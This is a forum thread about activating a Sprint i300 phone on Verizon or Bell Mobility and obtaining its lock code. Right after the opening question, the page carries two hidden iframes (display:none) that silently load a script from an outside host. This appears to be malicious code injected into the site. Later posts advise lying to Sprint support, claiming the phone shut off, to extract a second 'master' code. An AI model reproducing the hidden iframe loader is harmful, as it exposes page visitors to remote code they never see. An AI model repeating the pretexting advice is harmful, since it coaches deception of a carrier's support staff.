+ Reply to Thread

Thread: Verizon?

Verizon?

Has anyone heard an update? When will Verizon begin offering the i300; or, is this just a rumor?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Verizon will eventually be offering the phone. My best guess is sometime in late february.

The Man

Verizon Service

Hi,

I was considering buying an I300 on E-bay and activating it with Sprint. I know that another guy tried that this week and failed, but I would find out if I can get the lock code before buying the phone. My question is this: does the phone contain a lot of "Sprint specific" software that I would be unable to delete and unable to use?

I don't know if the Ebay sellers have the lock codes or not, I am just starting the process of researching. According to Verizon, they can utilize and CDMA phone on their network so it should work, technically.

Thanks,

KLM

Glad to have you here Kev. I believe the only app. that is Sprint specific is Sprint Web,and it cannot be deleted. I just checked my memory and its only taking up 53K so no biggie. The rest of the apps are Palm supported.

With respects to getting the code, good luck. I doubt these sellers will have recorded the number. I have called Sprint before to switch my account to an old phone and been given firdt the code, and when that shuts the phone off instead of pulling up another menu, been given a second code that always works. If what is being said on this thread is true, you'll need to manipulate yourself into obtaining this second code from Sprint.

Don't make a fuss about it, if you have access to another phone thurn the I300 on then switch to other phone then back. Even if the first code works tell them the phone shut off and they'll give you the second.

Good Luck & let us know

sorry for the long post guys.....eager to figure this out:o

The Man

Verizon

Thanks for the reply.

Let me get this straight: So if I take the first 14 days during the "trial period," turn on an I300, then switch to an old phone, then switch back to the I300 they would have to give me the second code to get it turned on that second time? Then, THAT is the code that Verizon would need in order to activate service? Do I understand correctly?

KLM

Yes. I believe it was ybf that tried this before and had no luck. I switched my phones to get the code, not realizing it differed for each phone, and obviously it did not work for him. The feasability of this process is also contingent upon you having access to another sprint phone. It can actually be a friends as it will be switched right back. Apparently the second code that is sometimes given is "the" master lock code and should do the trick with Verizon.

Also, they don't HAVE to give you this code as you state. Actually, you don't know about it. When they give you the code simply tell them the phone shut down after entering. They'll offer the second code as someone stated after using once, the code switches to the default.

Big Kev,

I just baught one frome-bay and will be using it in Canada.
    Please let me know if you get the master code. I will need it here to run on the Bell Mobility (our carrier) site.

Please and thank you.

You can email it to me as well as a reply to this.

Mike

mikol@code3.ca

A post in another thread suggested that there is no master code. That each individual esn has its own assigned code. You'll have to be creative to find it.